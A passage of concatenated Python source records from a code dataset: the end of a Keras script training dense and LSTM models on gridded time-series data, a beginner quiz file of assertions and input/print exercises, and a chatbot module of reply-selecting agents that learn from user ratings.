timestamp_test[0::T]])\r\n\r\nXX_train=np.load('XX_train.npy')\r\nXXp_test=np.load('XXp_test.npy')\r\n\r\nfor X in range(8):\r\n for Y in range(8):\r\n if X<=0:\r\n continue\r\n if X==1 and Y<=5:\r\n continue\r\n \r\n XTRAIN=XX_train[:,:,X+8,Y]\r\n YTRAIN=Y_train[:,:,X+8,Y]\r\n XTEST=XXp_test[9:,:,X+8,Y]\r\n YTEST=Y_test[:,:,X+8,Y]\r\n \r\n print('XTRAIN.shape= ',XTRAIN.shape)\r\n print('YTRAIN.shape= ',YTRAIN.shape)\r\n print('XTEST.shape= ',XTEST.shape)\r\n print('YTEST.shape= ',YTEST.shape)\r\n \r\n F1='DENSE2.hdf5'\r\n \r\n model_checkpoint=ModelCheckpoint(\r\n filepath=F1,\r\n monitor='val_rmse',\r\n verbose=1,\r\n save_best_only=True,\r\n save_weights_only=False,\r\n mode='min',\r\n period=1\r\n )\r\n \r\n print('=' * 10)\r\n print(\"training model...\")\r\n history = model1.fit(XTRAIN, YTRAIN,\r\n nb_epoch=nb_epoch,\r\n batch_size=batch_size,\r\n validation_split=0.1,\r\n callbacks=[model_checkpoint],\r\n verbose=1)\r\n \r\n print('=' * 10)\r\n print('evaluating using the model that has the best loss on the valid set')\r\n model1.load_weights(F1)\r\n score = model1.evaluate(XTRAIN, YTRAIN, batch_size=YTRAIN.shape[0] // 48, verbose=0)\r\n print('Train score: %.6f rmse (norm): %.6f rmse (real): %.6f' %\r\n (score[0], score[1], score[1] * (mmn._max - mmn._min) / 2. * m_factor))\r\n score = model1.evaluate(XTEST, YTEST, batch_size=YTEST.shape[0], verbose=0)\r\n print('Test score: %.6f rmse (norm): %.6f rmse (real): %.6f' %\r\n (score[0], score[1], score[1] * (mmn._max - mmn._min) / 2. * m_factor))\r\n\r\n Conv2[X,Y]=score[1] * (mmn._max - mmn._min) / 2. * m_factor\r\n\r\n\r\n TT2=10\r\n FF2=128\r\n \r\n input2_128=Input(shape=(TT2,FF2))\r\n cpt_conv2=PReLU()(input2_128)\r\n cpt_conv2=BatchNormalization()(cpt_conv2)\r\n cpt_conv2=LSTM(units=2,activation='tanh', recurrent_activation='hard_sigmoid',return_sequences=False)(cpt_conv2)\r\n output2=Dense(units=2)(cpt_conv2)\r\n model2=Model(inputs=input2_128,outputs=output2)\r\n model2.compile(loss='mse', optimizer=Adam(lr), metrics=[metrics.rmse])\r\n \r\n Xtrain=XX_train[:,:,X+8,Y].reshape([-1,1,FF2])\r\n XTRAIN=Xtrain[:-9]\r\n for i in range(8):\r\n XTRAIN=np.concatenate((XTRAIN,Xtrain[i+1:-(8-i)]),axis=1)\r\n XTRAIN=np.concatenate((XTRAIN,Xtrain[9:]),axis=1)\r\n \r\n Xptest=XXp_test[:,:,X+8,Y].reshape([-1,1,FF2])\r\n XTEST=Xptest[:-9]\r\n for i in range(8):\r\n XTEST=np.concatenate((XTEST,Xptest[i+1:-(8-i)]),axis=1)\r\n XTEST=np.concatenate((XTEST,Xptest[9:]),axis=1)\r\n \r\n YTRAIN=Y_train[9:,:,X+8,Y].reshape([-1,2])\r\n YTEST=Y_test[:,:,X+8,Y].reshape([-1,2])\r\n \r\n print('XTRAIN.shape= ',XTRAIN.shape)\r\n print('YTRAIN.shape= ',YTRAIN.shape)\r\n print('XTEST.shape= ',XTEST.shape)\r\n print('YTEST.shape= ',YTEST.shape)\r\n\r\n F2='LSTM2.hdf5'\r\n \r\n model_checkpoint=ModelCheckpoint(\r\n filepath=F2,\r\n monitor='val_rmse',\r\n verbose=1,\r\n save_best_only=True,\r\n save_weights_only=False,\r\n mode='min',\r\n period=1\r\n )\r\n \r\n print('=' * 10)\r\n print(\"training model...\")\r\n history = model2.fit(XTRAIN, YTRAIN,\r\n nb_epoch=nb_epoch,\r\n batch_size=batch_size,\r\n validation_split=0.1,\r\n callbacks=[model_checkpoint],\r\n verbose=1)\r\n \r\n print('=' * 10)\r\n print('evaluating using the model that has the best loss on the valid set')\r\n model2.load_weights(F2)\r\n score = model2.evaluate(XTRAIN, YTRAIN, batch_size=YTRAIN.shape[0] // 48, verbose=0)\r\n print('Train score: %.6f rmse (norm): %.6f rmse (real): %.6f' %\r\n (score[0], score[1], score[1] * (mmn._max - mmn._min) / 2. * m_factor))\r\n score = model2.evaluate(XTEST, YTEST, batch_size=YTEST.shape[0], verbose=0)\r\n print('Test score: %.6f rmse (norm): %.6f rmse (real): %.6f' %\r\n (score[0], score[1], score[1] * (mmn._max - mmn._min) / 2. * m_factor))\r\n \r\n LSTM2[X,Y]=score[1] * (mmn._max - mmn._min) / 2. * m_factor\r\n \r\n print(X+8,Y)\r\n print('Conv2',Conv2[X,Y])\r\n print('LSTM2',LSTM2[X,Y])\r\n np.save('Conv2.npy',Conv2)\r\n np.save('LSTM2.npy',LSTM2)\r\n","sub_path":"SRTcode/New/LSTM_new2.py","file_name":"LSTM_new2.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"356434813","text":"# >>>>>>>>>>>>>>>>>>>> Part 1 <<<<<<<<<<<<<<<<<<<<\nassert 15 // 4 == 3\nassert 24 % 5 == 4\nassert 24 / 3 * 4 + 2 == 34.0\nassert 3 * 2 ** 4 - 8 == 40\nassert 5.1 >= 5.0\nassert not 4 == 3 + 2\nassert not 4 * 2 - 2 != 6\nassert 100 > 10\nassert True and (3 <= 5) is True\n# assert not x == 0 == 'Error'\n\n\n# >>>>>>>>>>>>>>>>>>>> Part 2 <<<<<<<<<<<<<<<<<<<<\nassert not (14 // 3 and 4 > 5)\nassert 0 > 10 or False is False\nassert 'cat' in ['cat', 2.5, 'dog']\nassert not ('cours' not in 'python course')\nassert 'bark' if 'dog' in [13, 'cat', 5.6, 'cow'] else 'meow' == 'meow'\n\nmy_list = ['dog', 'cat', 'worm', 2.3]\nif 'doc' in my_list:\n my_list[1] = 4\nelse:\n my_list[2] = 6\n# print(my_list[1] my_list[2]) == 'cat 6'\n\nx = 10\nif x > 5:\n x += 5\nif x < 12:\n x += 5\nif x == 15:\n x += 5\nassert x == 20\n\nx = 20\nif True:\n x += 10\nif x == 20:\n x += 30\nelse:\n x += 40\nassert x == 70\n\nx = 4\nif 'z' in 'computer science':\n x += 10\nelif 5 % 3 == 2:\n x += 18\nelif 5 > 4:\n x += 30\nelse:\n x += 5\nassert x == 22\n\nx = 'c'\ny = 3\nif 'x' in 'computer science':\n y += 5\nelse:\n y += 10\nif x in 'computer science':\n y += 20\nelse:\n y += 40\nassert y == 33\n\n\n# >>>>>>>>>>>>>>>>>>>> Part 3 <<<<<<<<<<<<<<<<<<<<\n# Write a program which asks the user to enter their age in years\n# (Assume that the user always enters an integer) and based on the\n# following conditions, prints the output exactly as in the following\n# format (as highlighted in yellow):\n#\n# INPUT: age is less than or equal to 0\n# OUTPUT: 'UNBORN'\n#\n# INPUT: age is greater than 0 and less than or equal to 150\n# OUTPUT: 'ALIVE'\n#\n# INPUT: age is greater than 150\n# OUTPUT: 'VAMPIRE'\n\nage = int(input())\nif age <= 0:\n print('UNBORN')\nelif age <= 150:\n print('ALIVE')\nelse:\n print('VAMPIRE')\n\n\n# >>>>>>>>>>>>>>>>>>>> Part 4 <<<<<<<<<<<<<<<<<<<<\n# Write a program which asks the user to enter a positive integer 'n'\n# (Assume that the user always enters a positive integer) and based on\n# the following conditions, prints the appropriate results exactly as\n# shown in the following format:\n#\n# INPUT: 'n' is divisible by both 2 and 3 (for example 12)\n# OUTPUT: 'BOTH'\n#\n# INPUT: 'n' is divisible by either 2 or 3\n# OUTPUT: 'ONE'\n#\n# INPUT: 'n' is neither divisible by 2 nor divisible by 3\n# OUTPUT: 'NEITHER'\n\nn = int(input())\nif not n % 6:\n print('BOTH')\nelif not n % 2 or not n % 3:\n print('ONE')\nelse:\n print('NEITHER')\n\n\n# >>>>>>>>>>>>>>>>>>>> Part 5 <<<<<<<<<<<<<<<<<<<<\n# Write a program which asks the user to enter an integer 'n' which would\n# be the total numbers of hours the user worked in a week and calculates\n# and prints the total amount of money the user made during that week.\n#\n# If 'n' == any number less than 0 or greater than 168, print 'INVALID'\n# Assume that hourly rate for the first 40 hours is $8 per hour.\n# Hourly rate for extra hours between 41 and 50 (41 <= n <= 50 ) is $9 per hour.\n# Hourly rate for extra hours greater than 50 is $10 per hour.\n#\n# INPUT: -5\n# OUTPUT: 'INVALID'\n#\n# INPUT: -5\n# OUTPUT: 'INVALID'\n#\n# INPUT: 34\n# OUTPUT: 'YOU MADE 272 DOLLARS THIS WEEK'\n#\n# INPUT: 45\n# OUTPUT: 'YOU MADE 365 DOLLARS THIS WEEK'\n#\n# INPUT: 67\n# OUTPUT: 'YOU MADE 580 DOLLARS THIS WEEK'\n\nn = int(input())\nif n < 0 or n > 168:\n print('INVALID')\nelse:\n if n <= 40:\n total = n * 8\n elif n <= 50:\n total = (40 * 8) + (n - 40) * 9\n else:\n total = (40 * 8) + (10 * 9) + (n - 50) * 10\n print('YOU MADE {} DOLLARS THIS WEEK'.format(total))\n\n\n# >>>>>>>>>>>>>>>>>>>> Part 6 <<<<<<<<<<<<<<<<<<<<\n# Write a program that asks the user to enter a positive integer n.\n# Assuming that this integer is in seconds, your program should convert\n# the number of seconds into days, hours, minutes, and seconds and prints\n# them exactly in the format specified below.\n#\n# INPUT: 369121517\n# OUTPUT: '4272 days 5 hours 45 minutes 17 seconds'\n#\n# INPUT: 24680\n# OUTPUT: '0 days 6 hours 51 minutes 20 seconds'\n#\n# INPUT: 129600\n# OUTPUT: '1 days 12 hours 0 minutes 0 seconds'\n\nseconds = int(input())\ndays, seconds = divmod(seconds, 86400)\nhours, seconds = divmod(seconds, 3600)\nminutes, seconds = divmod(seconds, 60)\n\nprint('{} days {} hours {} minutes {} seconds'\n .format(days, hours, minutes, seconds))\n","sub_path":"quiz_2.py","file_name":"quiz_2.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"111403330","text":"\"\"\"\nThis module contains agents that gives text output on given input text\n\"\"\"\n\nimport os.path\nimport random\nimport math\nimport re\nfrom typing import List, Dict, Optional, Type, Tuple\nimport time\n\nfrom nltk import pos_tag\nfrom nltk.tokenize import sent_tokenize, word_tokenize\n\nimport json_manager\nimport logger\nimport text_processing\n\nLOGGER = logger.get_logger(__file__)\n\nrandom.seed(int(time.time()))\n\n\nclass NounsFindingAgent:\n \"\"\"\n Class for agent that sends one of the predefined replies or nothing\n depending on nouns in the input\n \"\"\"\n\n def __init__(self, phrases_json_path: str, nouns_json_path: str):\n # load data from input json\n phrases_data = json_manager.read(phrases_json_path)\n\n # dictionary with words as keys\n # and array of sentences that contain these words\n self.noun_sentences: Dict[Optional[str], List[str]] = dict()\n\n # for sentences without nouns\n self.noun_sentences[None] = list()\n\n # iterating through phrases data and storing nouns with sentences\n for sentence, nouns in phrases_data.items():\n if nouns:\n for noun in nouns:\n # if the noun occurs the first time set an empty array\n if noun not in self.noun_sentences:\n self.noun_sentences[noun] = list()\n self.noun_sentences[noun].append(sentence)\n else:\n # add sentence without nouns\n self.noun_sentences[None].append(sentence)\n\n # load data from input json\n nouns_data = json_manager.read(nouns_json_path)\n\n # dictionary with stemmed forms as keys\n # and lists of possible nouns that can have this stemmed form as values\n self.stemmed_nouns: Dict[str, List[str]] = dict()\n\n for noun, stemmed in nouns_data.items():\n # if the stemmed form occurs the first time\n # add entry with an empty list\n if stemmed not in self.stemmed_nouns:\n self.stemmed_nouns[stemmed] = list()\n self.stemmed_nouns[stemmed].append(noun)\n\n def get_replies(self, input_text: str,\n black_list: Optional[List[str]] = None) -> Tuple[List[str]]:\n \"\"\"\n Returns possible text outputs by\n searching known nouns in the input text\n and giving predefined phrases as a reply\n :param input_text: text containing natural language\n :param black_list: replies to be omitted from possible variants\n :return: possible reply variants\n \"\"\"\n\n if not input_text:\n return list(),\n\n words = word_tokenize(input_text)\n\n stemmed_words = list(map(text_processing.stem, words))\n\n reply_variants = list()\n\n # getting reply variants by checking each word if it is known\n for stemmed_word in stemmed_words:\n if stemmed_word in self.stemmed_nouns:\n LOGGER.info(f'\"{stemmed_word}\" is found in \"{input_text}\" text')\n for noun in self.stemmed_nouns[stemmed_word]:\n # adding sentences with this noun\n reply_variants += self.noun_sentences[noun]\n\n # omitting variants from black list\n reply_variants = list(filter(lambda x: x not in black_list, reply_variants))\n\n return reply_variants,\n\n\nclass LearningAgent:\n \"\"\"Agent that learns what to say\n depending on user's evaluation of replies given by replying agent\"\"\"\n _parts_of_speech = {\n 'noun': 'S',\n 'verb': 'V',\n 'personal pronoun': 'S-PRO',\n 'connecting words': 'CONJ',\n 'other': 'NONLEX'\n }\n\n def __init__(self, save_file_name: str):\n \"\"\"\n :param save_file_name: name of a json file to write learned information\n \"\"\"\n\n self.pattern_delimiter = '.* '\n\n self.save_file_name = save_file_name\n\n if os.path.isfile(save_file_name):\n self.knowledge_base = json_manager.read(save_file_name)\n else:\n self.knowledge_base: Dict[str, Dict[str, List[str]]] = dict()\n json_manager.write(self.knowledge_base, save_file_name)\n\n def _is_simple(self, tagged_words: List[Tuple[str, str]]) -> bool:\n # are there any punctuation symbols other than in the end?\n punctuation_symbols = \\\n list(filter(lambda tagged_word: tagged_word[1] == self._parts_of_speech['other'],\n tagged_words))\n if len(punctuation_symbols) > 1 or len(punctuation_symbols) == 1 \\\n and tagged_words[-1] != punctuation_symbols[0]:\n return False\n\n return True\n\n def _make_pattern_from_sentence(self, sentence: str) -> Optional[str]:\n \"\"\"\n Makes regex pattern out of sentence\n by getting all nouns, verbs and personal pronouns\n and joining them into one string\n :param sentence: input sentence\n :return: regex string or None if it's impossible to make one\n \"\"\"\n\n parts_of_speech = list()\n\n tagged = pos_tag(word_tokenize(sentence), lang='rus')\n\n # is sentence simple?\n if not self._is_simple(tagged):\n return None\n\n for word, tag in tagged:\n if tag in [self._parts_of_speech['noun'], self._parts_of_speech['verb'],\n self._parts_of_speech['personal pronoun']]:\n parts_of_speech.append(text_processing.stem(word))\n\n # is there anything to make pattern from?\n if not parts_of_speech:\n return None\n\n return self.pattern_delimiter.join(parts_of_speech)\n\n def _make_patterns_from_sentence(self, sentence: str) -> List[str]:\n \"\"\"\n Makes regex patterns out of sentence\n by splitting sentence into parts,\n getting all nouns, verbs and personal pronouns out of each one\n and joining them into one string\n :param sentence: input sentence\n :return: regex string or None if it's impossible to make one\n \"\"\"\n\n patterns = list()\n\n tagged = pos_tag(word_tokenize(sentence), lang='rus')\n\n # splitting sentence into parts and making a pattern out of each one\n sub_sentence = list()\n\n important_pos_tags = [self._parts_of_speech['noun'], self._parts_of_speech['verb'],\n self._parts_of_speech['personal pronoun']]\n punct_and_conj_tags = [self._parts_of_speech['connecting words'], self._parts_of_speech['other']]\n for i, tagged_word in enumerate(tagged):\n word, tag = tagged_word\n if tag in important_pos_tags:\n sub_sentence.append(text_processing.stem(word))\n if tag in punct_and_conj_tags or i == len(tagged) - 1:\n\n # do not allow a pattern with one word with length less than 3\n # or with more than 3 words to be created\n if sub_sentence and not (len(sub_sentence) == 1\n and len(sub_sentence[0]) < 3 or len(sub_sentence) > 3):\n patterns.append(self.pattern_delimiter.join(sub_sentence))\n sub_sentence = list()\n\n return patterns\n\n def learn(self, input_text: str, reply: str, right: bool) -> None:\n \"\"\"\n learns what is right or wrong to say\n :param input_text: text of input message\n :param reply: reply given by replying agent\n :param right: True if agent should learn that given combination of\n sentence pattern and reply is right or False if wrong\n :return: None\n \"\"\"\n\n # for right wrong cases\n key = 'replies' if right else 'black list'\n other_key = 'black list' if right else 'replies'\n\n sentences = sent_tokenize(input_text)\n\n # each sentence in the text is converted to regex pattern and the information\n # about right/wrong reply is added to knowledge base with this pattern as key\n for sentence in sentences:\n patterns = self._make_patterns_from_sentence(sentence)\n\n for pattern in patterns:\n if right:\n LOGGER.info(f'\"{pattern}\" is learned with reply \"{reply}\"')\n else:\n LOGGER.info(f'\"{pattern}\" is learned with prohibited reply \"{reply}\"')\n\n if pattern not in self.knowledge_base:\n self.knowledge_base[pattern] = dict()\n knowledge = self.knowledge_base[pattern]\n\n if key not in knowledge:\n knowledge[key] = list()\n\n if reply not in knowledge[key]:\n knowledge[key].append(reply)\n\n if other_key in knowledge and reply in knowledge[other_key]:\n # remove ALL occurrences of reply\n knowledge[other_key] = list(filter(lambda a: a != reply, knowledge[other_key]))\n\n json_manager.write(self.knowledge_base, self.save_file_name)\n\n def get_replies(self, input_text: str) -> Tuple[List[str], List[str]]:\n \"\"\"\n Gets allowed and prohibited replies by searching for patterns in knowledge base\n that match input text\n :param input_text: input text to search in\n :return: allowed and prohibited replies\n \"\"\"\n\n sentences = sent_tokenize(input_text)\n patterns = self.knowledge_base.keys()\n\n replies = list()\n black_list = list()\n\n # for each known pattern check if the input matches\n for sentence in sentences:\n for pattern in patterns:\n if re.search(pattern, input_text, re.I):\n LOGGER.info(f'\"{pattern}\" pattern is found in \"{sentence}\" sentence')\n\n # if there no replies for matched pattern but there are non-empty black list\n # then add this information\n if 'replies' in self.knowledge_base[pattern]:\n replies += self.knowledge_base[pattern]['replies']\n if 'black list' in self.knowledge_base[pattern]:\n black_list += self.knowledge_base[pattern]['black list']\n\n # removing replies from black list\n for wrong_reply in black_list:\n if wrong_reply in replies:\n # remove ALL occurrences of wrong reply from replies\n replies = list(filter(lambda a: a != wrong_reply, replies))\n\n return replies, black_list\n\n\nclass AgentPipeline:\n \"\"\"\n Pipeline that iteratively uses agents in order to get reply on input text\n \"\"\"\n\n def _agent_controller(self, **kwargs) -> Dict:\n \"\"\"\n Calls agent with arguments extracted from kwargs using agent callers\n and returns updated kwargs with new values that gives agent\n :param kwargs: arguments for agent caller\n 'reply': str\n Reply got from agent,\n 'black_list': List[str]\n Prohibited replies,\n 'no_empty_reply': bool\n flag for omitting empty reply,\n 'agent': [LearningAgent, NounsFindingAgent]\n Agent that processes input and returns reply\n :return: updated kwargs\n \"\"\"\n\n updated_kwargs = kwargs.copy()\n\n agent_type = type(kwargs.get('agent', None))\n # value to be updated in kwargs\n result = self._kwargs_converter[agent_type](*(self._agent_callers[agent_type](**kwargs)),\n kwargs)\n\n for key, value in result.items():\n updated_kwargs[key] = value\n\n return updated_kwargs\n\n def __init__(self, *args: [LearningAgent, NounsFindingAgent]):\n \"\"\"\n :param args: agents that will be in pipeline\n \"\"\"\n self.agents = args\n\n # for adapting kwargs to arguments used by agents\n self._agent_adapters: Dict[Type, 'function'] = dict()\n self._agent_adapters[NounsFindingAgent] = lambda **kwargs: \\\n (kwargs.get('input_text', None),\n kwargs.get('black_list', None))\n self._agent_adapters[LearningAgent] = lambda **kwargs: (kwargs.get('input_text', None),)\n self._agent_adapters[RandomReplyAgent] = lambda **kwargs: \\\n (kwargs.get('reply_variants', None),\n kwargs.get('black_list', None),\n kwargs.get('no_empty_reply', False))\n self._agent_adapters[RatingLearningAgent] = lambda **kwargs: (kwargs.get('input_text', None),)\n self._agent_adapters[RatingRandomReplyAgent] = lambda **kwargs: (kwargs.get('rated_replies', None),\n kwargs.get('reply_variants', None),\n kwargs.get('black_list', None),\n kwargs.get('no_empty_reply', False))\n\n # for calling agents' methods that process input message\n self._agent_callers: Dict[Type, 'function'] = dict()\n self._agent_callers[NounsFindingAgent] = lambda **kwargs: \\\n kwargs.get('agent', None).get_replies(*self._agent_adapters[NounsFindingAgent](**kwargs))\n self._agent_callers[LearningAgent] = lambda **kwargs: \\\n kwargs.get('agent', None).get_replies(*self._agent_adapters[LearningAgent](**kwargs))\n self._agent_callers[RandomReplyAgent] = lambda **kwargs: \\\n kwargs.get('agent', None).get_reply(*self._agent_adapters[RandomReplyAgent](**kwargs))\n self._agent_callers[RatingLearningAgent] = lambda **kwargs: \\\n kwargs.get('agent', None).get_rated_replies(*self._agent_adapters[RatingLearningAgent](**kwargs))\n self._agent_callers[RatingRandomReplyAgent] = lambda **kwargs: \\\n kwargs.get('agent', None).get_rated_reply(*self._agent_adapters[RatingRandomReplyAgent](**kwargs))\n\n # for converting agent's output to kwargs parameter(s)\n self._kwargs_converter: Dict[Type, 'function'] = dict()\n self._kwargs_converter[NounsFindingAgent] = lambda replies, kwargs: \\\n {'reply_variants': kwargs['reply_variants'] + replies}\n self._kwargs_converter[LearningAgent] = lambda replies, black_list, kwargs: \\\n {'reply_variants': kwargs['reply_variants'] + replies,\n 'black_list': kwargs['black_list'] + black_list}\n self._kwargs_converter[RandomReplyAgent] = lambda reply, kwargs: \\\n {'reply': reply}\n self._kwargs_converter[RatingLearningAgent] = lambda rated_replies, kwargs: \\\n {'rated_replies': rated_replies}\n self._kwargs_converter[RatingRandomReplyAgent] = lambda reply, kwargs: \\\n {'reply': reply}\n\n def get_reply(self, input_text: str, no_empty_reply: bool = False) -> Optional[str]:\n \"\"\"\n Passes arguments through each of agents and\n returns reply on input text\n :param input_text: input text\n :param no_empty_reply: flag that indicates must there be a mandatory non-empty reply or not\n is mandatory and False otherwise\n :return: text reply on input text or None if there are no reply on given input\n \"\"\"\n\n # initial values for kwargs\n init_kwargs = {\n 'reply': None,\n 'reply_variants': list(),\n 'rated_replies': dict(),\n 'input_text': input_text,\n 'no_empty_reply': no_empty_reply,\n 'black_list': list()\n }\n\n kwargs = init_kwargs\n\n # iterating through agents and passing kwargs through each one\n for agent in self.agents:\n kwargs['agent'] = agent\n\n # update kwargs by assignment new value got from agent\n kwargs = self._agent_controller(**kwargs)\n\n return kwargs.get('reply', None)\n\n\nclass RatingLearningAgent(LearningAgent):\n \"\"\"\n Learning agent with rating system for replies\n \"\"\"\n\n def __init__(self, save_file_name: str, predecessor_save_file: str = \"\"):\n if not os.path.isfile(save_file_name) and os.path.isfile(predecessor_save_file):\n super().__init__(predecessor_save_file)\n self.__recreate_knowledge_base(save_file_name)\n else:\n super().__init__(save_file_name)\n\n def __recreate_knowledge_base(self, path_to_base_file) -> None:\n \"\"\"\n recreates knowledge base from predecessor's base and writes it as json file\n :param path_to_base_file: path to the new base json file\n :return: None\n \"\"\"\n\n # initial values for replies from predecessor\n init_good_reply_val = 5\n init_bad_reply_val = -5\n\n old_base = self.knowledge_base\n new_knowledge_base: Dict[str, Dict[str, int]] = dict()\n for pattern, rules in old_base.items():\n if pattern not in new_knowledge_base:\n new_knowledge_base[pattern]: Dict[str, int] = dict()\n for reply in rules.get('replies', []):\n new_knowledge_base[pattern][reply] = init_good_reply_val\n for reply in rules.get('black list', []):\n new_knowledge_base[pattern][reply] = init_bad_reply_val\n self.knowledge_base = new_knowledge_base\n self.save_file_name = path_to_base_file\n json_manager.write(self.knowledge_base, path_to_base_file)\n\n def rating_learn(self, input_text: str, reply: str, rating_change: int) -> None:\n \"\"\"\n Learns a patterns made from inputs text and corresponding reply\n by rating pairs of patterns and replies\n :param input_text: text that the bot received\n :param reply: reply that the bot gave\n :param rating_change: how much rating should be increased or decreased\n :return: None\n \"\"\"\n\n sentences = sent_tokenize(input_text)\n\n for sentence in sentences:\n patterns = self._make_patterns_from_sentence(sentence)\n\n for pattern in patterns:\n if pattern not in self.knowledge_base:\n self.knowledge_base[pattern] = dict()\n\n knowledge = self.knowledge_base[pattern]\n knowledge[reply] = knowledge.get(reply, 0) + rating_change\n\n LOGGER.info(f'pattern {pattern} is learned with reply {reply} with rating {knowledge[reply]}')\n\n json_manager.write(self.knowledge_base, self.save_file_name)\n\n def get_rated_replies(self, input_text: str) -> Tuple[Dict[str, int]]:\n \"\"\"\n Gets rated replies on given input text\n :param input_text: text message from user\n :return: replies and corresponding rating\n \"\"\"\n result = dict()\n all_patterns = list(self.knowledge_base.keys())\n found_patterns = list(filter(lambda pattern: re.search(pattern, input_text, re.I), all_patterns))\n for found_pattern in found_patterns:\n LOGGER.info(f'pattern {found_pattern} is found in text {input_text}')\n for reply, rating in self.knowledge_base[found_pattern].items():\n result[reply] = result.get(reply, 0) + rating\n\n return result,\n\n\nclass RandomReplyAgent:\n \"\"\"\n Agent that chooses random replies from given ones\n \"\"\"\n\n def __init__(self, path_to_phrases: str):\n if not (path_to_phrases or os.path.isfile(path_to_phrases)):\n LOGGER.error('wrong phrases path for RandomReplyAgent')\n return\n\n self._all_phrases = list(json_manager.read(path_to_phrases).keys())\n self._max_weight = 1024\n # for multiplying weight of a given reply\n self.__given_reply_multiplier = 2\n self.__random_reply_divisor = 2\n self._phrases_weights: Dict[str, int] = dict()\n for phrase in self._all_phrases:\n self._phrases_weights[phrase] = self._max_weight\n\n def _decrease_weight(self, reply) -> None:\n \"\"\"\n Decreases weight of a phrase that was used as a reply last time\n :param reply: reply phrase\n :return: None\n \"\"\"\n if reply:\n self._phrases_weights[reply] = round(math.sqrt(self._phrases_weights[reply]))\n if self._phrases_weights[reply] < 2:\n self._phrases_weights[reply] = self._max_weight\n\n def get_reply(self, replies: List[str], black_list: List[str],\n no_empty_reply: bool) -> Tuple[Optional[str]]:\n \"\"\"\n Gets random reply or nothing if there are no possible replies\n :param replies: given replies\n :param black_list: prohibited replies\n :param no_empty_reply: flag to indicate that there must be a non-empty reply\n as a returned value\n :return: one chosen reply or None\n \"\"\"\n if replies:\n if no_empty_reply:\n k = 1\n else:\n k = math.floor(len(replies) / 2)\n\n # adding a random number of additional phrases\n # depending on no_empty_reply parameter\n random_replies = random.choices(list(filter(lambda x: x not in replies,\n self._all_phrases)), k=k)\n possible_replies = replies + random_replies\n else:\n possible_replies = self._all_phrases if no_empty_reply else list()\n\n # omitting phrases from black list\n if black_list:\n possible_replies = list(filter(lambda x: x not in black_list, possible_replies))\n\n # choosing the reply depending on how many times it was used before\n # and if it is in replies\n if possible_replies:\n reply = random.choices(possible_replies, weights=list(map(\n lambda phrase:\n self._phrases_weights[phrase] * self.__given_reply_multiplier if phrase in replies else\n self._phrases_weights[phrase], possible_replies)))[0]\n else:\n reply = None\n\n # decreasing weight of a chosen reply\n self._decrease_weight(reply)\n\n return reply,\n\n\nclass RatingRandomReplyAgent(RandomReplyAgent):\n \"\"\"Agent that chooses reply for and input text randomly\n and takes into account given rated replies\"\"\"\n\n def __init__(self, path_to_phrases: str):\n super().__init__(path_to_phrases)\n\n @staticmethod\n def __get_rated_weight(rating, weight):\n if rating >= 0:\n rated_weight = round(math.log(rating + math.e) * weight)\n else:\n rated_weight = round(weight * 4 ** rating)\n return 0 if rated_weight < 0 else rated_weight\n\n def get_rated_reply(self, rated_replies: Dict[str, int], replies: List[str], black_list: List[str],\n no_empty_reply: bool) -> Tuple[Optional[str]]:\n \"\"\"\n Gets random reply from given rated and regular replies and all phrases\n :param rated_replies: replies with rating\n :param replies: replies without rating\n :param black_list: replies that should not be chosen\n :param no_empty_reply: flag that indicates must there be a mandatory non-empty reply or not\n :return: reply on None if it's not possible to get a reply\n \"\"\"\n possible_replies: List[str] = list()\n\n # if there are no rated replies with positive rating\n # then there must be regular replies\n if replies or rated_replies:\n possible_replies = \\\n list(set(filter(lambda x: x not in black_list, replies + list(filter(lambda x: rated_replies[x] >= 0,\n list(rated_replies.keys()))))))\n\n # adding one random phrase\n if possible_replies and random.choices([True, False], weights=[1, 4]):\n possible_replies += random.choices(list(filter(lambda x: (not black_list or x not in black_list) and\n (not replies or x not in replies)\n and (not rated_replies or x not in rated_replies),\n self._all_phrases)))\n\n if no_empty_reply and not possible_replies:\n possible_replies = list(filter(lambda x: x not in black_list, self._all_phrases))\n\n if possible_replies:\n reply = random.choices(possible_replies,\n list(map(lambda x:\n self.__get_rated_weight(rated_replies.get(x, 0),\n self._phrases_weights.get(x, 0)),\n possible_replies)))[0]\n else:\n reply = None\n\n self._decrease_weight(reply)\n\n return reply,\n\n\nclass MessagesCounter:\n \"\"\"For control of messages frequency of the bot\"\"\"\n\n # minimum number of messages between bot's replies\n messages_period = 100\n # number of all messages that bot received\n messages_num = 0\n\n def count_and_check(self) -> bool:\n \"\"\"\n increases number of received messages and checks if it is more than period\n :return: is messages number more than period?\n \"\"\"\n self.messages_num += 1\n return self.messages_num > self.messages_period\n\n def reset(self) -> None:\n \"\"\"\n resets counter\n :return: None\n \"\"\"\n self.messages_num = 0\n\n\nclass TextCallChecker:\n \"\"\"\n Checks if the text contains the calling construction\n \"\"\"\n\n def __init__(self):\n self.names = frozenset([\n 'рей',\n 'аянами',\n 'рей аянами',\n 'аянами рей'\n ])\n\n def check(self, text) -> bool:\n \"\"\"\n checks if the text contains the calling construction\n using regex searching with names\n :param text: text to check\n :return: True if text contains the construction else False\n \"\"\"\n punct_symbols_string = r'\\,\\.\\!\\?'\n\n text = text.replace(\"\\n\", \"\")\n\n for name in self.names:\n regex_strings = [\n f'^{name}$',\n f'^{name}[{punct_symbols_string}]',\n f'[{punct_symbols_string}] {name}\\\\?'\n ]\n\n for regex_s in regex_strings:\n if re.search(regex_s, text, re.I):\n return True\n\n return False\n\n\nclass ConversationController:\n \"\"\"\n Controls how bot should reply on a given message depending on its source\n \"\"\"\n\n def __init__(self, agent_pipeline: AgentPipeline):\n self._messages_counter = MessagesCounter()\n self._call_checker = TextCallChecker()\n\n self._agent_pipeline = agent_pipeline\n\n @staticmethod\n def _is_question(text) -> bool:\n return True if re.search(r'\\?', text) else False\n\n def proceed_input_message(self, input_text: str,\n is_private: bool = False,\n is_call: bool = False) -> Optional[str]:\n \"\"\"\n chooses parameters for agent pipeline depending on\n message source type (private or group) and message content\n :param input_text: text of the message\n :param is_private: is message private?\n :param is_call: does message contains calling construction?\n :return: reply on message or None\n \"\"\"\n is_call = is_call or self._call_checker.check(input_text)\n no_empty_reply = True if is_call or is_private and (self._is_question(input_text)\n or random.choices([True, False], weights=[2, 1])[\n 0]) else False\n\n if is_call or is_private or random.choices([True, False], [1, 29])[0]:\n reply = 